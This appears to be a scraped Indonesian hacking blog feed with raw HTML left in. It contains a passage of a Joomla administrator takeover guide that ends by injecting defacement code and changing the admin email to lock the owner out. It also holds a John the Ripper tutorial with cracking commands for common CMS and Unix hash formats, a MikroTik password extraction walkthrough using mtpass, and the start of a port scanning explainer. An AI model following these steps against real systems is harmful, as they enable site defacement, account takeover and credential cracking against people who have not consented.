src="http://img576.imageshack.us/img576/1710/007pa.png" width="266" /></a></div><div style="text-align: left;"><span style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px;">If you done everything ok, Rest your Password page will load. Enter your new password…<br />
After that go to:</span><br style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /><div class="codeblock" style="background-color: white; border: 1px solid rgb(204, 204, 204); font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; padding: 4px;"><div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin: 4px 0px;">Code:</div><div class="body" dir="ltr"><code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow: auto;">http://www.site.com/administrator/</code></div></div><span style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px;">Standard Joomla portal content management system<br />
Enter username admin and your password, click on Login<br />
Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML<br />
<br />
In Template HTML Editor insert your defaced code, click Apply, Save and you are done!!!</span> </div></div><div class="separator" style="clear: both; text-align: center;"><a href="http://img291.imageshack.us/img291/8648/008bo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="271" src="http://img291.imageshack.us/img291/8648/008bo.png" width="320" /></a></div><div style="text-align: left;"><span style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px;">To make admin life more miserable, click on admin in main Joomla window and in User Details page change admin E-mail</span> </div><div class="separator" style="clear: both; text-align: center;"><a href="http://img707.imageshack.us/img707/8946/009kw.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="319" src="http://img707.imageshack.us/img707/8946/009kw.png" width="320" /></a></div><div style="text-align: left;"><span style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px;"><br />
</span></div><div style="text-align: left;"><span style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;">Credit: MindFreak [HckGuide]</span> </div>

Hacking Administrator Joomla – Get Full Access!

Tools required:SQL-i Knowledgereiluke SQLiHelper 2.7Joomla! Query KnowledgeFinding Exploit And TargetThose two steps could go in different order, depend what you find first target or exploit… Google d…

07 Jun 2012

[TUTOR] Cracking Password - John The Ripper

<span style="font-weight: bold;">MD5 HASH</span><br />
Format = karakter hexa 0-F<br />
Panjang = 32 karakter<br />
<br />
<span style="font-style: italic;">Contoh md5 hash</span><br />
84e3fbdf4986585d06d4e7aa2c2e2be7<br />
555f70a1c266100421e2cf45d62a3938<br />
<br />
<span style="font-style: italic;">Cara crack</span><br />
save hashes dalam format <span style="font-style: italic;">id:hash</span>, id boleh apa aja, kita pake nomer aja biar ke urut<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>1:84e3fbdf4986585d06d4e7aa2c2e2be7<br />
2:1a1dc91c907325c69271ddf0c944bc72</code></div></div>save sebagai crack.txt, lalu crack dengan perintah<br />
<blockquote><cite>Quote:</cite># menggunakan wordlist yg saya taro di /media/DATA2/wordlist/all.lst<br />
<span style="font-weight: bold;">./<span class="highlight" style="padding-left: 0px; padding-right: 0px;">john</span> --wordlist=/media/DATA2/wordlist/all.lst --format=raw-md5 crack.txt</span><br />
Loaded 2 password hashes with no different salts (Raw MD5 [raw-md5 SSE2 16x4])<br />
c0de             (1)<br />
pass             (2)<br />
guesses: 2  time: 0:00:00:00 100.00% (ETA: Tue Jan 25 09:43:10 2011)  c/s: 5389  trying: franklin - system<br />
<br />
# atau di bruteforce, incremental bisa dipilih antara alnum,alpha,all,etc liat folder <span class="highlight" style="padding-left: 0px; padding-right: 0px;">john</span>, file yg berakhiran .chr<br />
<span style="font-weight: bold;">./<span class="highlight" style="padding-left: 0px; padding-right: 0px;">john</span> --incremental=alnum --format=raw-md5 crack.txt</span><br />
Loaded 2 password hashes with no different salts (Raw MD5 [raw-md5 SSE2 16x4])<br />
pass             (2)<br />
c0de             (1)<br />
guesses: 2  time: 0:00:00:00  c/s: 994836  trying: 4apm - c0df</blockquote>Berhasil, tuh passwordnya c0de dan pass<br />
<br />
<hr /><br />
<span style="font-weight: bold;">MD4 HASH</span><br />
Format = karakter hexa 0-F<br />
Panjang = 32 karakter<br />
<br />
<span style="font-style: italic;">Contoh md4 hash</span><br />
a2a9d88a2965472048022a72ee9b654a<br />
52e9e9e4f1cd6d1abc78aa866d2a5509<br />
<br />
<span style="font-style: italic;">Cara crack</span><br />
save hashes dalam format <span style="font-style: italic;">id:hash</span>, id boleh apa aja, kita pake nomer aja biar ke urut<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>1:a2a9d88a2965472048022a72ee9b654a<br />
2:52e9e9e4f1cd6d1abc78aa866d2a5509</code></div></div>save sebagai crack.txt, lalu crack dengan perintah<br />
<blockquote><cite>Quote:</cite># menggunakan wordlist yg saya taro di /media/DATA2/wordlist/all.lst<br />
<span style="font-weight: bold;">./<span class="highlight" style="padding-left: 0px; padding-right: 0px;">john</span> --wordlist=/media/DATA2/wordlist/all.lst --format=raw-md4 crack.txt</span><br />
<br />
# atau di bruteforce, incremental bisa dipilih antara alnum,alpha,all,etc liat folder <span class="highlight" style="padding-left: 0px; padding-right: 0px;">john</span>, file yg berakhiran .chr<br />
<span style="font-weight: bold;">./<span class="highlight" style="padding-left: 0px; padding-right: 0px;">john</span> --incremental=alnum --format=raw-md4 crack.txt</span></blockquote><br />
<hr /><br />
<span style="font-weight: bold;">SHA1 HASH</span><br />
Format = karakter hexa 0-F<br />
Panjang = 40 karakter<br />
<br />
<span style="font-style: italic;">Contoh sha1 hash</span><br />
39b228b789d9202d6bbc05ea13d486d2d1e5e5fc<br />
9d4e1e23bd5b727046a9e3b4b7db57bd8d6ee684<br />
<br />
<span style="font-style: italic;">Cara crack</span><br />
save hashes dalam format <span style="font-style: italic;">id:hash</span>, id boleh apa aja, kita pake nomer aja biar ke urut<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>1:39b228b789d9202d6bbc05ea13d486d2d1e5e5fc<br />
2:9d4e1e23bd5b727046a9e3b4b7db57bd8d6ee684</code></div></div>save sebagai crack.txt, lalu crack dengan perintah<br />
<blockquote><cite>Quote:</cite># menggunakan wordlist yg saya taro di /media/DATA2/wordlist/all.lst<br />
<span style="font-weight: bold;">./<span class="highlight" style="padding-left: 0px; padding-right: 0px;">john</span> --wordlist=/media/DATA2/wordlist/all.lst --format=raw-sha1 crack.txt</span><br />
<br />
# atau di bruteforce, incremental bisa dipilih antara alnum,alpha,all,etc liat folder <span class="highlight" style="padding-left: 0px; padding-right: 0px;">john</span>, file yg berakhiran .chr<br />
<span style="font-weight: bold;">./<span class="highlight" style="padding-left: 0px; padding-right: 0px;">john</span> --incremental=alnum --format=raw-sha1 crack.txt</span></blockquote><br />
<hr /><br />
<span style="font-weight: bold;">JOOMLA HASH</span><br />
Format = karakter hexa 0-F + Salt<br />
Salt = 16 karakter (alpha numeric)<br />
Panjang = 32 karakter + 16 karakter (Salt)<br />
md5($password . $salt);<br />
<br />
<span style="font-style: italic;">Contoh joomla hash</span><br />
0afa236b9490fef1c0fde90eddb5a7f5:YEfafQuaj58ExG3V<br />
5c3c273efa3523c4bbfb318d23fd9952:tNT52oL0I8ClmMjO<br />
<br />
<span style="font-style: italic;">Cara crack</span><br />
save hashes dalam format <span style="font-style: italic;">id:md5_gen(1)hash$salt</span>, id boleh apa aja, kita pake nomer aja biar ke urut<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>1:md5_gen(1)0afa236b9490fef1c0fde90eddb5a7f5$YEfafQuaj58ExG3V<br />
2:md5_gen(1)5c3c273efa3523c4bbfb318d23fd9952$tNT52oL0I8ClmMjO</code></div></div>save sebagai crack.txt, lalu crack dengan perintah<br />
<blockquote><cite>Quote:</cite># menggunakan wordlist yg saya taro di /media/DATA2/wordlist/all.lst<br />
<span style="font-weight: bold;">./<span class="highlight" style="padding-left: 0px; padding-right: 0px;">john</span> --wordlist=/media/DATA2/wordlist/all.lst --subformat=md5_gen$1$ crack.txt</span><br />
<br />
# atau di bruteforce, incremental bisa dipilih antara alnum,alpha,all,etc liat folder <span class="highlight" style="padding-left: 0px; padding-right: 0px;">john</span>, file yg berakhiran .chr<br />
<span style="font-weight: bold;">./<span class="highlight" style="padding-left: 0px; padding-right: 0px;">john</span> --incremental=alnum --subformat=md5_gen$1$ crack.txt</span></blockquote><br />
<hr /><br />
<span style="font-weight: bold;">PHPASS (WORDPRESS/PHPBB3) HASH</span><br />
Format = $P$/$H$ + B/9 + SALT + HASH<br />
Panjang = 34 karakter<br />
<br />
<span style="font-style: italic;">Contoh phpass hash</span><br />
$P$937lj8T3rci18KkTykssJJWHrtsVtb/<br />
$P$9A0K1lIdw.kor5gTe41Js5KnAhWI9p0<br />
<br />
<span style="font-style: italic;">Cara crack</span><br />
save hashes dalam format <span style="font-style: italic;">id:hash</span>, id boleh apa aja, kita pake nomer aja biar ke urut<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>1:$P$937lj8T3rci18KkTykssJJWHrtsVtb/<br />
2:$P$9A0K1lIdw.kor5gTe41Js5KnAhWI9p0</code></div></div>save sebagai crack.txt, lalu crack dengan perintah<br />
<blockquote><cite>Quote:</cite># menggunakan wordlist yg saya taro di /media/DATA2/wordlist/all.lst<br />
<span style="font-weight: bold;">./<span class="highlight" style="padding-left: 0px; padding-right: 0px;">john</span> --wordlist=/media/DATA2/wordlist/all.lst --subformat=md5_gen$17$ crack.txt</span><br />
<br />
# atau di bruteforce, incremental bisa dipilih antara alnum,alpha,all,etc liat folder <span class="highlight" style="padding-left: 0px; padding-right: 0px;">john</span>, file yg berakhiran .chr<br />
<span style="font-weight: bold;">./<span class="highlight" style="padding-left: 0px; padding-right: 0px;">john</span> --incremental=alnum --subformat=md5_gen$17$ crack.txt</span></blockquote><br />
<hr /><br />
<span style="font-weight: bold;">MD5 UNIX</span><br />
Format = $1$ + SALT + $ + HASH<br />
Panjang = 34 karakter<br />
<br />
<span style="font-style: italic;">Contoh md5 unix hash</span><br />
$1$QQa2/imc$KKcokGZ.1KmqNLrBgJAFK0<br />
$1$cXjVAJx4$uUQtJgL4u8Kj8R6lnTbTT0<br />
<br />
<span style="font-style: italic;">Cara crack</span><br />
save hashes dalam format <span style="font-style: italic;">id:hash</span>, id boleh apa aja, kita pake nomer aja biar ke urut<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>1:$1$QQa2/imc$KKcokGZ.1KmqNLrBgJAFK0<br />
2:$1$cXjVAJx4$uUQtJgL4u8Kj8R6lnTbTT0</code></div></div>save sebagai crack.txt, lalu crack dengan perintah<br />
<blockquote><cite>Quote:</cite># menggunakan wordlist yg saya taro di /media/DATA2/wordlist/all.lst<br />
<span style="font-weight: bold;">./<span class="highlight" style="padding-left: 0px; padding-right: 0px;">john</span> --wordlist=/media/DATA2/wordlist/all.lst --format=md5 crack.txt</span><br />
<br />
# atau di bruteforce, incremental bisa dipilih antara alnum,alpha,all,etc liat folder <span class="highlight" style="padding-left: 0px; padding-right: 0px;">john</span>, file yg berakhiran .chr<br />
<span style="font-weight: bold;">./<span class="highlight" style="padding-left: 0px; padding-right: 0px;">john</span> --incremental=alnum --format=md5 crack.txt</span></blockquote><br />
<hr /><br />
<span style="font-weight: bold;">VBULLETIN HASH</span><br />
Format = karakter hexa 0-F + Salt<br />
Panjang = 32 karakter + (3 karakter Salt)<br />
md5(md5($password) . $salt)<br />
<br />
<span style="font-style: italic;">Contoh vbulletin hash</span><br />
5ed2aa7420efed95a285828cd0df7023:iC0<br />
3c8a04fa2caea2d69585f0b7add4241e:VPM<br />
<br />
<span style="font-style: italic;">Cara crack</span><br />
save hashes dalam format <span style="font-style: italic;">id~md5_gen(7)hash$salt</span>, id boleh apa aja, kita pake nomer aja biar ke urut<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>1~md5_gen(7)5ed2aa7420efed95a285828cd0df7023$iC0<br />
2~md5_gen(7)3c8a04fa2caea2d69585f0b7add4241e$VPM</code></div></div>save sebagai crack.txt, lalu crack dengan perintah<br />
<blockquote><cite>Quote:</cite># menggunakan wordlist yg saya taro di /media/DATA2/wordlist/all.lst<br />
<span style="font-weight: bold;">./<span class="highlight" style="padding-left: 0px; padding-right: 0px;">john</span> --wordlist=/media/DATA2/wordlist/all.lst --subformat=md5_gen$7$ --field-separator-char="~" crack.txt</span><br />
<br />
# atau di bruteforce, incremental bisa dipilih antara alnum,alpha,all,etc liat folder <span class="highlight" style="padding-left: 0px; padding-right: 0px;">john</span>, file yg berakhiran .chr<br />
<span style="font-weight: bold;">./<span class="highlight" style="padding-left: 0px; padding-right: 0px;">john</span> --incremental=alnum --subformat=md5_gen$7$ --field-separator-char="~" crack.txt</span></blockquote><br />
<hr /><div><div style="margin: 4px;"><div class="smallfont" style="margin-bottom: 2px;"><i><span style="font-weight: bold;">List dari subformat yg ane pake (liat pake perintah : john --subformat=LIST</span></i><input onclick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = ''; this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }" style="font-size: 10px; margin: 0px; padding: 0px; width: 60px;" type="button" value="Show" /></div><div class="alt2" style="border: 1px inset; margin: 0px; padding: 6px;"><div style="display: none;">Format = dynamic_0 type = dynamic_0: md5($p) (raw-md5)<br />
Format = dynamic_1 type = dynamic_1: md5($p.$s) (joomla)<br />
Format = dynamic_2 type = dynamic_2: md5(md5($p)) (e107)<br />
Format = dynamic_3 type = dynamic_3: md5(md5(md5($p)))<br />
Format = dynamic_4 type = dynamic_4: md5($s.$p) (OSC)<br />
Format = dynamic_5 type = dynamic_5: md5($s.$p.$s)<br />
Format = dynamic_6 type = dynamic_6: md5(md5($p).$s)<br />
Format = dynamic_7 type = dynamic_7: md5(md5($p).$s) (vBulletin)<br />
Format = dynamic_8 type = dynamic_8: md5(md5($s).$p)<br />
Format = dynamic_9 type = dynamic_9: md5($s.md5($p))<br />
Format = dynamic_10 type = dynamic_10: md5($s.md5($s.$p))<br />
Format = dynamic_11 type = dynamic_11: md5($s.md5($p.$s))<br />
Format = dynamic_12 type = dynamic_12: md5(md5($s).md5($p)) (IPB)<br />
Format = dynamic_13 type = dynamic_13: md5(md5($p).md5($s))<br />
Format = dynamic_14 type = dynamic_14: md5($s.md5($p).$s)<br />
Format = dynamic_15 type = dynamic_15: md5($u.md5($p).$s)<br />
Format = dynamic_16 type = dynamic_16: md5(md5(md5($p).$s).$s2)<br />
Format = dynamic_17 type = dynamic_17: phpass ($P$ or $H$)<br />
Format = dynamic_18 type = dynamic_18: md5($s.Y.$p.0xF7.$s) (Post.Office MD5)<br />
Format = dynamic_19 type = dynamic_19: Cisco PIX (MD5)<br />
Format = dynamic_20 type = dynamic_20: Cisco PIX (MD5 salted)<br />
Format = dynamic_21 type = dynamic_21: HTTP Digest Access Auth<br />
Format = dynamic_22 type = dynamic_22: md5(sha1($p))<br />
Format = dynamic_23 type = dynamic_23: sha1(md5($p))<br />
Format = dynamic_24 type = dynamic_24: sha1($p.$s)<br />
Format = dynamic_25 type = dynamic_25: sha1($s.$p)<br />
Format = dynamic_26 type = dynamic_26: sha1($p) raw-sha1<br />
Format = dynamic_27 type = dynamic_27: FreeBSD MD5<br />
Format = dynamic_28 type = dynamic_28: Apache MD5<br />
Format = dynamic_29 type = dynamic_29: md5(unicode($p))<br />
UserFormat = dynamic_1001 type = dynamic_1001 md5(md5(md5(md5($p))))<br />
UserFormat = dynamic_1002 type = dynamic_1002 md5(md5(md5(md5(md5($p)))))<br />
UserFormat = dynamic_1003 type = dynamic_1003 md5(md5($p).md5($p))<br />
UserFormat = dynamic_1004 type = dynamic_1004 md5(md5(md5(md5(md5(md5($p))))))<br />
UserFormat = dynamic_1005 type = dynamic_1005 md5(md5(md5(md5(md5(md5(md5($p)))))))<br />
UserFormat = dynamic_1006 type = dynamic_1006 md5(md5(md5(md5(md5(md5(md5(md5($p))))))))<br />
UserFormat = dynamic_1007 type = dynamic_1007 md5(md5($p).$s) [vBulletin]<br />
UserFormat = dynamic_1008 type = dynamic_1008 md5($p.$s) [RADIUS User-Password]<br />
UserFormat = dynamic_1009 type = dynamic_1009 md5($s.$p) [RADIUS Responses]<br />
<br />
</div></div></div></div>Silahkan di coba<br />
<img alt="asik" border="0" src="http://devilzc0de.org/forum/images/smilies/asik.gif" style="vertical-align: middle;" title="asik" /><br />
<br />
Author: <b>Revres Tanur</b>

[TUTOR] Cracking Password - John The Ripper

MD5 HASH Format = karakter hexa 0-F Panjang = 32 karakter Contoh md5 hash 84e3fbdf4986585d06d4e7aa2c2e2be7 555f70a1c266100421e2cf45d62a3938 Cara crack save hashes dalam format id:hash, id boleh apa aj…

05 Jun 2012

Membongkar Password Mikrotik dengan Linux

Salam Hangat, <br />
Tutorial ini dibuat untuk sahabat-sahabat yang mungkin belum terlalu paham memanfaatkan linux untuk membongkar password mikrotik.          <br />
<div class="bbcode_container" data-iceapc="3" data-iceapw="17"><div class="bbcode_quote" data-iceapc="2" data-iceapw="17"><div class="quote_container" data-iceapc="1" data-iceapw="17">Catatan : Tutorial ini hanya bisa diimplementasikan untuk PC router. Untuk Routerboard akan dibahas di tutorial lain.       </div></div></div><div class="bbcode_container" data-iceapc="3" data-iceapw="2"><div class="bbcode_quote" data-iceapc="2" data-iceapw="2"><div class="quote_container" data-iceapc="1" data-iceapw="2">Langsung aja..       </div></div></div><div class="bbcode_container" data-iceapc="3" data-iceapw="24"><div class="bbcode_quote" data-iceapc="2" data-iceapw="24"><div class="quote_container" data-iceapc="1" data-iceapw="24">1. Gunakanlah CD/DVD Linux yang anda terbiasa menggunakannya. Contoh  ini menggunakan Live CD Ubuntu 10.04 LTS. Atur BIOS supaya first boot  ke CD/DVD-ROM. <span class="IL_AD" id="IL_AD5">Masukkan</span> CD.       </div></div></div><div class="bbcode_container" data-iceapc="7" data-iceapw="14"><div class="bbcode_quote" data-iceapc="6" data-iceapw="14"><div class="quote_container" data-iceapc="5" data-iceapw="14">2. Tunggu proses bootnya. Jika muncul seperti di gambar, pilih "Try Ubuntu 10.04 LTS"<br />
<table align="center" bgcolor="#555555" border="0" cellpadding="2" cellspacing="2" data-iceapc="3"><tbody data-iceapc="2">
<tr data-iceapc="1"><td><fieldset class="bbfieldset"><legend class="bblegend">Content</legend><br />
<div><div class="pre-spoiler"></div><div></div></div></fieldset></td></tr>
</tbody></table></div></div></div><div class="bbcode_container" data-iceapc="7" data-iceapw="28"><div class="bbcode_quote" data-iceapc="6" data-iceapw="28"><div class="quote_container" data-iceapc="5" data-iceapw="28">3. Masukkan USB <span class="IL_AD" id="IL_AD12">flashdisk</span> yang anda punya. Pada menu "Places" akan terbaca partisi dari Router Mikrotik (contoh pada gambar: 263MB Filesystem) dan Flashdisk anda (contoh pada gambar: ewyn, itha).<br />
<table align="center" bgcolor="#555555" border="0" cellpadding="2" cellspacing="2" data-iceapc="3"><tbody data-iceapc="2">
<tr data-iceapc="1"><td><fieldset class="bbfieldset"><legend class="bblegend">Content</legend><br />
<div><div class="pre-spoiler"></div><div></div></div></fieldset></td></tr>
</tbody></table></div></div></div><div class="bbcode_container" data-iceapc="7" data-iceapw="45"><div class="bbcode_quote" data-iceapc="6" data-iceapw="45"><div class="quote_container" data-iceapc="5" data-iceapw="45">4. File yang menyimpan informasi login di mikrotik adalah User.dat. Letak file ini berada di: /media/partisirouteranda/rw/store/user.dat. Untuk mikrotik  versi lama (mungkin versi 2), letak filenya di :   /media/partisirouteranda/nova/store/user.dat. Jika anda mencoba untuk  mengcopy file user.dat melalui Nautilus (file <span class="IL_AD" id="IL_AD3">explorer</span>), maka ini yang akan terjadi. Error.<br />
<table align="center" bgcolor="#555555" border="0" cellpadding="2" cellspacing="2" data-iceapc="3"><tbody data-iceapc="2">
<tr data-iceapc="1"><td><fieldset class="bbfieldset"><legend class="bblegend">Content</legend><br />
<div><div class="pre-spoiler"></div><div></div></div></fieldset></td></tr>
</tbody></table></div></div></div><div class="bbcode_container" data-iceapc="7" data-iceapw="18"><div class="bbcode_quote" data-iceapc="6" data-iceapw="18"><div class="quote_container" data-iceapc="5" data-iceapw="18">5. Error diatas disebabkan oleh masalah hak akses. Untuk  mengkasesnya dibutuhkan hak akses setingkat root. Masuk ke Terminal. <br />
<table align="center" bgcolor="#555555" border="0" cellpadding="2" cellspacing="2" data-iceapc="3"><tbody data-iceapc="2">
<tr data-iceapc="1"><td><fieldset class="bbfieldset"><legend class="bblegend">Content</legend><br />
<div><div class="pre-spoiler"></div><div></div></div></fieldset></td></tr>
</tbody></table></div></div></div><div class="bbcode_container" data-iceapc="8" data-iceapw="46"><div class="bbcode_quote" data-iceapc="7" data-iceapw="46"><div class="quote_container" data-iceapc="6" data-iceapw="46">#sudo su --> perintah ini digunakan untuk berpindah ke super user / root<br />
#cd /media/partisirouteranda --> ini digunakan untuk masuk kedalam partisi router anda<br />
#cd /rw/store --> masuk kedalam direktori store dimana file user.dat tersimpan<br />
#ls --> melihat isi directory store<br />
dan ini dia tersangkanya <img alt="" border="0" class="inlineimg" src="http://www.indonesianhacker.or.id/images/smilies/1.gif" title="senang" /> :<br />
<table align="center" bgcolor="#555555" border="0" cellpadding="2" cellspacing="2" data-iceapc="3"><tbody data-iceapc="2">
<tr data-iceapc="1"><td><fieldset class="bbfieldset"><legend class="bblegend">Content</legend><br />
<div><div class="pre-spoiler"></div><div></div></div></fieldset></td></tr>
</tbody></table></div></div></div><div class="bbcode_container" data-iceapc="7" data-iceapw="34"><div class="bbcode_quote" data-iceapc="6" data-iceapw="34"><div class="quote_container" data-iceapc="5" data-iceapw="34">6. Langkah selanjutnya adalah copykan file user.dat ke flashdisk  anda. Jika anda tanya kenapa harus dicopy? karena kita tidak akan  mendecrypt file user.dat disini, tapi di komputer/laptop lain yang telah  terinstall Linux dengan baik.<br />
<table align="center" bgcolor="#555555" border="0" cellpadding="2" cellspacing="2" data-iceapc="3"><tbody data-iceapc="2">
<tr data-iceapc="1"><td><fieldset class="bbfieldset"><legend class="bblegend">Content</legend><br />
<div><div class="pre-spoiler"></div><div></div></div></fieldset></td></tr>
</tbody></table></div></div></div><div class="bbcode_container" data-iceapc="3" data-iceapw="14"><div class="bbcode_quote" data-iceapc="2" data-iceapw="14"><div class="quote_container" data-iceapc="1" data-iceapw="14">7. Setelah tercopy ke flashdisk dengan baik, anda dapat mematikan pc router anda sekarang.       </div></div></div><div class="bbcode_container" data-iceapc="3" data-iceapw="19"><div class="bbcode_quote" data-iceapc="2" data-iceapw="19"><div class="quote_container" data-iceapc="1" data-iceapw="19">8. Mulai poin ini semua akan kita lakukan di laptop/komputer lain yang telah terpasang Linux. Nyalakan laptop Linux anda.        </div></div></div><div class="bbcode_container" data-iceapc="3" data-iceapw="62"><div class="bbcode_quote" data-iceapc="2" data-iceapw="62"><div class="quote_container" data-iceapc="1" data-iceapw="62">9. Kita akan menggunakan tool mtpass versi 0.6 buatan Manio (<a href="http://manio.skyboo.net/mikrotik/" target="_blank">http://manio.skyboo.net/mikrotik/</a>). Mtpass versi 0.6 bisa didownload disini : <a href="http://manio.skyboo.net/mikrotik/mtpass-0.6.tar.bz2" target="_blank">http://manio.skyboo.net/mikrotik/mtpass-0.6.tar.bz2</a>  . Tool ini membutuhkan pustaka openssl development dan build-essential  sebelum bisa digunakan. di ubuntu atau turunan debian lainnya, anda  dapat menginstalnya dengan perintah berikut :<br />
# sudo apt-get install libssl-dev build-essential<br />
jika tidak memiliki repository lokal di <span class="IL_AD" id="IL_AD10">harddisk</span> anda, pastikan anda terkoneksi ke internet.       </div></div></div><div class="bbcode_container" data-iceapc="3" data-iceapw="9"><div class="bbcode_quote" data-iceapc="2" data-iceapw="9"><div class="quote_container" data-iceapc="1" data-iceapw="9">10. Jika tool mtpass 0.6 sudah anda download, extraklah.       </div></div></div><div class="bbcode_container" data-iceapc="7" data-iceapw="21"><div class="bbcode_quote" data-iceapc="6" data-iceapw="21"><div class="quote_container" data-iceapc="5" data-iceapw="21">11. Masukkan flashdisk anda yang berisi file user.dat. Copykan file user.dat ke dalam directory hasil extrakan mtpass. Kira-kira seperti ini :<br />
<table align="center" bgcolor="#555555" border="0" cellpadding="2" cellspacing="2" data-iceapc="3"><tbody data-iceapc="2">
<tr data-iceapc="1"><td><fieldset class="bbfieldset"><legend class="bblegend">Content</legend><br />
<div><div class="pre-spoiler"></div><div></div></div></fieldset></td></tr>
</tbody></table></div></div></div><br />
<div class="bbcode_container" data-iceapc="3" data-iceapw="7"><div class="bbcode_quote" data-iceapc="2" data-iceapw="7"><div class="quote_container" data-iceapc="1" data-iceapw="7">12. Masuklah kedalam directory mtpass. <br />
berikan perintah:       </div></div></div><div class="bbcode_container" data-iceapc="3" data-iceapw="27"><div class="bbcode_quote" data-iceapc="2" data-iceapw="27"><div class="quote_container" data-iceapc="1" data-iceapw="27">#sudo make --> tunggu sampe selesai<br />
#ls --> pastikan tulisan mtpass berwarna hijau. Itu artinya mtpass sudah executable. Jika belum berikan perintah berikut :<br />
#chmod 755 mtpass       </div></div></div><div class="bbcode_container" data-iceapc="8" data-iceapw="17"><div class="bbcode_quote" data-iceapc="7" data-iceapw="17"><div class="quote_container" data-iceapc="6" data-iceapw="17">13. Tiba saatnya untuk membongkar file user.dat. Gunakan perintah :<br />
#./mtpass user.dat<br />
dan usaha anda pun berhasil <img alt="" border="0" class="inlineimg" src="http://www.indonesianhacker.or.id/images/smilies/1.gif" title="senang" /> <br />
<table align="center" bgcolor="#555555" border="0" cellpadding="2" cellspacing="2" data-iceapc="3"><tbody data-iceapc="2">
<tr data-iceapc="1"><td><fieldset class="bbfieldset"><legend class="bblegend">Content</legend><br />
<div><div class="pre-spoiler"></div><div></div></div></fieldset></td></tr>
</tbody></table></div></div></div><br />
<div class="bbcode_container" data-iceapc="4" data-iceapw="25"><div class="bbcode_quote" data-iceapc="3" data-iceapw="25"><div class="quote_container" data-iceapc="2" data-iceapw="25">14. perintah diatas bisa juga anda gunakan untuk membongkar password mikrotik dari file backup router mikrotik anda. So, jangan sembarang menaruh file backupan router <img alt="" border="0" class="inlineimg" src="http://www.indonesianhacker.or.id/images/smilies/1.gif" title="senang" /> .       </div></div></div><br />
Semoga bermanfaat tutorial sederhana dari Tukang Sapu. <br />
<br />
<br />
<br />
<br />
-- salam hangat <img alt="" border="0" class="inlineimg" src="http://www.indonesianhacker.or.id/images/smilies/9.gif" title="pipi memerah" />

Membongkar Password Mikrotik dengan Linux

Salam Hangat, Tutorial ini dibuat untuk sahabat-sahabat yang mungkin belum terlalu paham memanfaatkan linux untuk membongkar password mikrotik. Catatan : Tutorial ini hanya bisa diimplement…

03 Jun 2012

Under Contruction

Under Contruction

Maaf ya kawan,.. untuk smentara blog ini, agak rusak :p lagi ganti template. hehe…

03 Jun 2012

Implementasi Port Scanning

Adalah langkah awal yang harus kita lakukan sebelum kita melakukan aktivitas hacking jarak jauh (remote) <br />
yang berfungsi untuk melihat servis yang diberikan oleh server / target  di Internet. Dalam konsep jaringan komputer klien-server, setiap program  / servis akan menempati sebuah port dalam tatanan protokol TCP (<span class="IL_AD" id="IL_AD4">Transmission Control</span> Protocol). <br />
Dengan port scanning, seseorang dapat mengetahui port-port mana saja yang terbuka pada sebuah host.<br />
<br />
oke sebelum kita melakukan scanning port ada baiknya kita mengetahui bagaimana cara kerja <span class="IL_AD" id="IL_AD5">port scanner</span> seperti : Nmap, Superscan, Strobe,dsb.<br />
<br />
<b data-iceapw="5">A. Cara Kerja Port Scanning</b> <br />
<div data-iceapc="9" data-iceapw="172" style="margin-left: 40px;"><br />
<u data-iceapw="4">1. TCP Connect Scan</u><br />
<br />
Yang pertama adalah dengan menggunakan metode yang dinamakan TCP 3 Way <span class="IL_AD" id="IL_AD7">Handshake</span>. TCP koneksi akan dicoba dilakukan terhadap target dengan mengirimkan SYN paket, dan apabila Port dalam keadaan terbuka, maka target akan mengembalikan SYN/ACK paket.<br />
<br />
Apabila paket RSET atau dalam waktu tertentu tidak diterima jawaban apa-apa, Timeout, maka dapat diambil kesimpulan target port dalam keadaan tertutup. Walaupun sebenarnya, hal ini dapat saja diakibatkan oleh firewall atau <span class="IL_AD" id="IL_AD6">filtering</span> lainnya di komputer target.<br />
<br />
<u data-iceapw="4">2. TCP Syn Scan</u><br />
<br />
Dengan mengirimkan paket RSET sebelum koneksi TCP terjadi, server target  tidak sempat mengambil log dari komunikasi waktu scan dilakukan.<br />
<br />
Apabila port dalam keadaan tertutup, kondisinya sama dengan pada saat TCP Connect Scan.<br />
<br />
<u data-iceapw="6">3. UDP Scan (ICMP Port Unreach)</u><br />
<br />
Metode terakhir di sini adalah dengan menggunakan UDP paket. Port dianggap terbuka apabila tidak ada jawaban dari komputer target.<br />
<br />
Dan, apabila port dalam keadaan tertutup, maka komputer target akan mengirimkan paket ICMP Port Unreachable, seperti terlihat pada gambar. Hanya saja, di beberapa network yang menggunakan firewall atau filtering lainnya, paket ini tidak diteruskan ke luar network.</div><br />
<b data-iceapw="5">B. LETS SCAN TARGET !!</b><br />
<br />
